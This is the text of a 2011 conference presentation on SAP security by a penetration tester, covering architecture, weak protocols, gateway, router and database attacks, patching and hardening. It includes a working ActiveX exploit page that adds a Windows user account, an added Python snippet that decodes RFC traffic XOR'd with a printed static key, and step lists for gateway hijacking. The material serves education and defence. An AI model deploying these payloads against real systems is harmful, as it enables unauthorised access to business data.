SAP (in)security Chris John Riley Raiffeisen Informatik GmbH

Source: itsecx.fhstp.ac.at/downloads_2011/04_Riley.pdf (SAP (in)security – FH St.Pölten, Chris John Riley, Raiffeisen Informatik)


SAP (in)security Chris John Riley

Raiffeisen Informatik GmbH

Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 2 SAP (in)security – FH St.Pölten

world$whoami

Chris John Riley

English (That was obvious really)

Network and Web-App Penetration Tester

Working for Raiffeisen Informatik Security Competence Center in Zwettl

13+ years working in IT (unlucky 13?)

A bit of everything really… "Jack of all trades"

Still learning something new every day

As we all should!

Blogger and Twitterer (is that even a word?)

Blogger (http://blog.c22.cc)

Twitterer (@ChrisJohnRiley)

Podcaster (Eurotrash Security Podcast - NSFW)

"The wisest man is he who knows that he knows nothing"


What we’ll cover today

SAP Basics

SAP Architecture

SAP Components

SAP Threats / Attacks

SAP Conclusions


1. SAP Basics


What is SAP?

“…the world's leading provider of business software, SAP (which stands for "Systems, Applications, and Products in Data Processing") delivers products and services that help accelerate business innovation for our customers.”

source: sap.com


What is SAP?

SAP Offerings

ERP (Enterprise Resource Planning)

CRM (Customer Relationship Management)

SCM (Supply Chain Management)

PLM (Product Life-cycle Management)

SRM (Supplier Relationship Management)

GRC (Governance, Risk and Compliance)


What is SAP?

Customers in 120 countries

More than 100,000 clients worldwide

More than 40,000 employees

More than 140,000 SAP implementations

Covering every possible industry

From Automotive to Wholesale Distribution


source: sap.com


What is SAP?

Growing target, despite its complexity

Holds the keys to the kingdom

Financial data

Personal data

Client data

Business workflows

Surely such an important system must be secured!

RIGHT?


Source: h-online.com


2010 Patches

2010: SAP releases more than 900 fixes

Large complex systems will always have configuration issues

Vulnerabilities per line of code?

*Industry Average: “~15 - 50 errors per 1000 lines of delivered code"

Code Execution

Buffer Overflows

Cross-Site Scripting

….

*source: "Code Complete" by Steve McConnell


2. SAP Architecture


SAP Architecture

SAP R/3 (ABAP)

mySAP Netweaver (JAVA/ABAP)

– Three Tier Client/Server arch.

Presentation Server

Application Server

Database Server


SAP Building Blocks

[Diagram: PRD, QAS and DEV systems; connections labelled RFC, DIAG and HTTP/HTTPS; mySAP, Ext. Customer and Ext. Server]


SAP Building Blocks

SAP DATABASE SERVER

Clients (No. | Name | Type):
000 | SAPR    | Default
001 | SAPR    | Default
066 | EARLY   | Default
500 | CLIENT1 | CUST
501 | CLIENT2 | CUST
502 | CLIENT3 | CUST


SAP Building Blocks

Connection protocols

DIAG: Client Connection – SAPGUI

RFC: Server to Server Connection

HTTP/HTTPS: WEBGUI, WebServices (Agate/Wgate/ITS)

Database: TNS Listener (Oracle), JDBC, ….


DIAG

Used for SAPGUI connections

Connections on port 32<instance> (e.g. 3200)

Proprietary Protocol

Supports some RFC request types (sRFC)

Compressed

Non-standard compression

Decompression tools available

Basically, clear-text!


RFC

Used for Server connections

Most used SAP protocol

Proprietary Protocol

Different Types of RFC communications

Synchronous (sRFC)

Asynchronous (aRFC)

Transactional (tRFC)

Queued (qRFC)


RFC

Helpful API released by SAP (rfcsdk)

Supports ext. clients / servers

Traffic is encrypted*

SAP offers SNC encryption at a cost!

Key = [0x96, 0xde, 0x51, 0x1e, 0x74, 0xe, 0x9, 0x9, 0x4, 0x1b, 0xd9,
       0x46, 0x3c, 0x35, 0x4d, 0x8e, 0x55, 0xc5, 0xe5, 0xd4, 0xb, 0xa0, 0xdd,
       0xd6, 0xf5, 0x21, 0x32, 0xf, 0xe2, 0xcd, 0x68, 0x4f, 0x1a, 0x50, 0x8f,
       0x75, 0x54, 0x86, 0x3a, 0xbb]

* Traffic is XOR’d with a static key

That was a good idea

Basically clear-text!
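Added example in Python (not from the slides, not SAP's code): it shows why XOR with a hard-coded key (CWE-321) is no better than cleartext, using the key bytes listed above, and gives a defender a quick check for whether a captured RFC payload is merely XOR-obfuscated rather than SNC-protected. It assumes the key is applied as a plain repeating keystream; how the real RFC library frames the data is not shown on the slide.

```python
from itertools import cycle
from typing import Optional

# Static key exactly as printed on the slide (40 bytes).
STATIC_KEY = bytes([
    0x96, 0xde, 0x51, 0x1e, 0x74, 0x0e, 0x09, 0x09, 0x04, 0x1b, 0xd9,
    0x46, 0x3c, 0x35, 0x4d, 0x8e, 0x55, 0xc5, 0xe5, 0xd4, 0x0b, 0xa0, 0xdd,
    0xd6, 0xf5, 0x21, 0x32, 0x0f, 0xe2, 0xcd, 0x68, 0x4f, 0x1a, 0x50, 0x8f,
    0x75, 0x54, 0x86, 0x3a, 0xbb,
])


def xor_static(data: bytes, key: bytes = STATIC_KEY) -> bytes:
    """XOR data with a repeating key (assumed framing, see lead-in).

    XOR is an involution: applying the same key twice returns the input,
    so anyone holding the published key can decode what was 'encrypted'.
    """
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """CWE-321 in one line: a single known plaintext (for example a fixed
    protocol header) hands back the key bytes, even without the slide."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))


def looks_like_text(data: bytes, threshold: float = 0.9) -> bool:
    """Heuristic: share of printable ASCII bytes (plus TAB/LF/CR)."""
    if not data:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in data)
    return printable / len(data) >= threshold


def decode_if_static_xor(blob: bytes) -> Optional[bytes]:
    """Defender's check for a captured RFC payload: if XORing with the
    public key yields readable text, the link is not protected by SNC."""
    decoded = xor_static(blob)
    return decoded if looks_like_text(decoded) else None


# Constructed sample, not real captured traffic.
SAMPLE_PLAINTEXT = b"CLIENT=500 USER=ADMIN PASSWD=secret1"
SAMPLE_CIPHERTEXT = xor_static(SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print("decoded:", decode_if_static_xor(SAMPLE_CIPHERTEXT))
    print("key bytes recovered:",
          recover_keystream(SAMPLE_CIPHERTEXT, SAMPLE_PLAINTEXT).hex())
```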


SNC

SAP’s solution to the unencrypted communications of DIAG/RFC

Provides integrity and/or privacy

External product

Naturally… it’s an add-on ($$$)

Not simple to implement (PKI?)

Afterthought?


SAP TechEd 2011 (image)


3. SAP Components


SAP Gateway

Handles ALL CPIC/RFC communications

Communications between SAP systems

Communications between SAP and External systems

Works in 2 modes

Started Mode

Application Server Starts on demand

Connection is closed after operation completes

Registered Mode

External server registers itself at the Gateway

Program ID (TPNAME) used to identify connection

External server connection remains open


SAP Gateway

Round-Robin / Load Balancing support

Multiple servers can register as the same ID (TPNAME)

Service is locked while a request is being handled

Remote server can perform connectbacks to client

While a client is connected, the remote server can instruct them to perform actions on other SAP servers

Default SAP configuration

No auth required

Anybody can register

Not usually web accessible

At least, that‘s what I thought!

[Diagram: SAP SERVER with SAP GATEWAY; registered external servers SER1 and SER_EXT]


SAP Gateway

* source: http://sap.com


SAP Router

SAP version of a reverse proxy

Designed to analyze / restrict SAP network traffic that is passed through the firewall

Sits on the perimeter (internet accessible!)

Listens on port 3299/tcp

Filters based on IP address / protocol

Logs activity

Enforces password security / SNC

Syntax: /H/host/S/service/W/password

Not all parameters are required

(/S/, /W/ are optional)


SAP Router

source: http://help.sap.com

Official SAP Router Diagram


SAP Router

Why would you want to do that!

Connections from external partners

Remote Administration

Internal staff

Required for SAP AG (mandatory)

Monitoring

Troubleshooting


SAP Router - saprouttab

Example:

D 192.168.0.1 192.168.0.200 servicex
P 192.168.1.1 192.168.0.200 3300 passwd
S 192.168.2.2 192.168.0.200 * sappwd
KP * 192.168.0.200 4444
....

First-match / Deny on no match

D – Deny

P – Permit

S – Permit SAP Protocol only

Kx – Force SNC (e.g. KP, KS)


SAP Router

Example (realistic):

saprouttab
----------------------------------------------------------------------------------
P * * *
----------------------------------------------------------------------------------

Permit any/any

Well it works!


SAP Router (New)

Permit any/any still works (but not for everything)

* in the service field no longer means ANY

* Excludes non-SAP services

This means no more firewall bypasses!

… or does it!

Commonly seen examples:

P 10.*.*.* * 3389 #Remote Desktop Protocol
P 10.1.*.* 10.2.*.* 5601 #PcAnywhere
P * * telnet


SAP Web Dispatcher

Acts as a reverse proxy / load balancer for HTTP(S) requests

Load Balancing, selecting the appropriate Application Server

Sits on the perimeter

Hides internal infrastructure

Filters URLs

Implements SSL in 2 modes

end-to-end – Connections forwarded without decryption

SSL Terminator – Connections decrypted to the dispatcher


SAP ITS / ICM

ITS (Internet Transaction Server)

Enables Web Access to SAP Applications

Translates Dialog screens into HTML

SAPGUI for the Internet!

ICM (Internet Communication Manager)

Direct access to SAP Application Server through HTTP(S) / SMTP

Unlike ITS, users don‘t need to interact with middleware

Requests handled directly by the Web Application Server

SAP in the Internet age!

Now even China can see your customer list!


SAP WebServices

SAP Management Console’s communication channel

Communicates over port 5<instance>13/14 (e.g. 50013)

Can use SSL for transport encryption

Port 50014

Uses BASIC auth for some functions

Windows:

MMC Plug-in, uses SOAP requests in the background

*nix:

JAVA Applet, uses SOAP requests in the background


The B!G picture

How often are these ports open to the world?

AKA: Scanning a small country

Ports 3299, 3300, 50013, 50014

SYN scan only

We don‘t want to connect to them after all!


[Chart: SAP Ports Austria, open-port counts for SAP Router (3299), SAP Gateway (3300), SAP MC and SAP MC (SSL); axis ticks 2570 to 2660]


4. SAP Threats / Attacks


Drinking from the firehose of information technology


What we’ve already seen

CWE-319*: Cleartext Transmission of Sensitive Information

RFC – XOR (CWE-321*: Use of Hard-coded Cryptographic Key)

DIAG – Encoded/Compressed

SOAP over HTTP

ICM/ITS over HTTP

Usage of SSL / SNC optional (costs)

* (http://cwe.mitre.org)

[Diagram: PRD, QAS and DEV systems; connections labelled RFC, DIAG and HTTP/HTTPS; mySAP, Ext. Customer and Ext. Server]


What we’ve already seen (SAPGUI)

Attacks

• Man in the Middle

• Replay Attacks

• Sniffing (usernames, passwords)


What we’ve already seen (SAP Database)

No separation of client data

All Client data is stored in the same Database

One hack to rule them all!

Developers can run direct SQL queries

Attackers can gain access through one client and access ALL data

No valid separation of permissions on the DB

SAP SERVER

Clients (No. | Name | Type):
000 | SAPR    | Default
001 | SAPR    | Default
066 | EARLY   | Default
500 | CLIENT1 | CUST
501 | CLIENT2 | CUST
502 | CLIENT3 | CUST

Attacks

• Exposure of client data

• Command injection through DB


What we’ve already seen (ORACLE)

Oracle Database

Have you heard of OSAUTHENT?

Remote OS Authentication (sounds harmless)

Trusts the remote system to perform authentication!

OPS$

Connection Example:

1. User logged into remote system as sapadm

2. Connects to Oracle TNS Listener (port 1521)

3. User says „I‘m authenticated on my system as sapadm“

4. Oracle server replies „Yes sir! Welcome sapadm“

5. Profit!


What we’ve already seen (ORACLE)

Oracle Database

It‘s ok though, you can turn that feature off

remote_os_authent = false

As long as you set the username / password to a static value

SAPR3:PASS

Attacks

• Complete SAP DB access

• NO PASSWORD REQUIRED!


What we’ve already seen (SAP Gateway)

SAP Gateway Registration

Remote systems register themselves with the SAP server

What would happen if an attacker registers?

No authentication by default

Anybody can be a server!

[Diagram: SAP SERVER with SAP GATEWAY; registered servers SER1 and ATTACKER1]


SAP Gateway - Exploitation

Attacks

• Evil Twin / Man in the Middle

• Denial of Service

[Diagram: SAP SERVER with SAP GATEWAY; the registered server SER1 is BLOCKED / IN-USE while the attacker registers as SER1]

1. Attacker connects to the existing registered server (ID=SER1)

2. By maintaining this connection the registered server is blocked

3. Attacker registers themselves on the gateway as ID=SER1 also

4. Wait for connections from clients/servers

5. Profit!


What we’ve already seen (RFC)

Many other issues with RFC

Insecure functions

RFC_DOCU

RFC_PING

RFC_SYSTEM_INFO

RFCEXEC

Buffer Overflows

….

Attacks

• Lack of authentication on RFC functions

• Exposure of information

• Command injection


What we’ve already seen (SAP Router)

SAP Router

Designed to route traffic

Why not take advantage of those ANY:ANY rules to bypass the firewall

Connect through the SAProuter port using tsocks

Attack the weak underbelly of the server!

Attacks

• Firewall Bypass

[Diagram: ATTACKER connects to the SAP ROUTER; TCP 1521 is routed through to the ORACLE DB, and RFC is routed through to the SAP SERVER]


What we’ve already seen (Client-Side)

Patching Client-Side Applications is still a problem

Often no central management

Why patch it if it works!

Client-Side ActiveX

SAPGUI

Lots of Client-Side exploits public

Some very simple to exploit

Attacks

• Client-Side Code Execution

• Web-Based Exploitation (ActiveX)


Client-Side ActiveX – Exploit Example

<html>
<title>*DSecRG* Add user *DSecRG*</title>
<object classid="clsid:A009C90D-814B-11D3-BA3E-080009D22344" id='DH'></object>
<script language='Javascript'>
function init()
{ DH.Execute("net.exe","user don_huan p4ssW0rd /add","d:\\windows\\",1,"",1);}
init();
</script>
</html>


Current Research

WebServices (Management Console)

SOAP requests, many unauthenticated

Enabled by default on ALL SAP systems

Lots of interesting pieces of information for an attacker

Data extraction

Surely there‘s nothing useful here!


Current Research

WebServices (Management Console)

Unauthenticated access to :

SAP Version information (down to patch level)

SAP Startup profile

SAP Instance properties

System environment variables

List SAP logfiles

Download / View complete logfiles

Including username information


Current Research

WebServices (Management Console)

Automate the extraction of data with Metasploit*

source: http://blog.c22.cc

Attacks

• Information Disclosure

• Extraction of Usernames

• SAP Instance information

• Extract Version information

• OSexecute


WebService - Version Information

[+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel

[+] [SAP] SID: NSP


WebService – Start Profile

[+] SAPSYSTEMNAME – NSP

[+] SAPGLOBALHOST – WINXPSAP-TST

[+] SAPSYTEM – 00

[+] INSTANCE_NAME – DVEBMGS00


WebService – Instance / Environment

[+] SAP SYSTEM NUMBER: 00

[+] SAP SYSTEM NAME: NSP

[+] ICM URL: HTTP://WINXPSAP-TST/ICM

[+] DATABASE: Database-SAPDB

[+] COMPUTERNAME=WINXPSAPTST

[+] PATH: …

[+] PROCESSOR ARCHITECTURE =x86


WebService – Log Files

Information Disclosure

• SAP Status

• Startup Times

• PID

• Errors

• Debug data

• …


WebService – Log Files (extract users)

Information Disclosure

• Usernames

• Lockout information

• …


SAP Management Console

Goldmine of information

As we‘ve seen

The present that keeps on giving!

But there‘s more…

Ability to brute-force passwords

Output a FULL configuration!

Execute commands on the remote server

Gain shell access


5. SAP Conclusions


Conclusions

Historical SAP Security

Separation of privileges

Developer access checks

Debug permissions

Password policies

ABAP code security


Conclusions

The new School

Infrastructure attacks

Database vulnerabilities

Buffer overflows (saplpd, ...)

Web Application vulnerabilities

XSS

CSRF

Attacks against the clients

SAPGUI

ActiveX components


Conclusions

SAP – The new hotness

Blackhat DC / Las Vegas

DefCon

Troopers

DeepSEC

Blackhat EU

BSides

….

SAP Presentations are the new black!


Patching SAP

Patches are released monthly

To coincide with MS patch Tuesday

Very limited information sharing outside of acknowledgments

Note

• Imagine running that process for 500 patches!

• Don’t forget to patch the OS, DB, clients

• Not a simple prospect!


Patching SAP (server)

Applying patches

Download each patch from SAP (registration required)

Apply to DEV/QA systems using SPAM (SAP Patch Manager)

Perform required testing

Schedule downtime

All users must be logged off during update process

Apply to PROD using SPAM

Perform required testing


Patching SAP (custom code)

Patching troubles

Often patches break existing functionality/code

3rd Party patching solutions available

Panaya - SAP Upgrade Automation

Analyses custom code

Tells you what could break!


Patching SAP (client)

Regular patches to correct client-side security flaws

Supported in PSI/CSI*

Simple central rollout

Often forgotten!

* Limited information on secunia website


Hardening?

Searching for „hardening“ on the SAP site results in documents dating from ~2006

Other results include people requesting hardening guidance

SAP Hardening guides

SAP hardening and patch management guide for Windows server http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/library/uuid/31d3e9ef-0c01-0010-01b8-8fbf154c0aca

Last updated 08 August 2008

help.sap.com: range of (mostly business) best practice guides

Best practice / Secure programming references

Some limited security documentation


Conclusions

This presentation only scratches the surface

SAP released more than 900 fixes in 2010

Large complex system

Many bugs yet to be discovered!

SAP has become, and will remain, a prime target for attackers

All the good stuff in one place

Keys to the kingdom

Bad patching practices

If it‘s not broken don‘t fix it

Never touch a running system

Lack of information from SAP


Questions?

Comments?

Abuse!


Thank you for your attention!

Raiffeisen Informatik GmbH

Lilienbrunngasse 7-9

A-1020 Wien

T +43 1/99 3 99 - 0

F +43 1/99 3 99 - 1100

E [email protected]

www.raiffeiseninformatik.at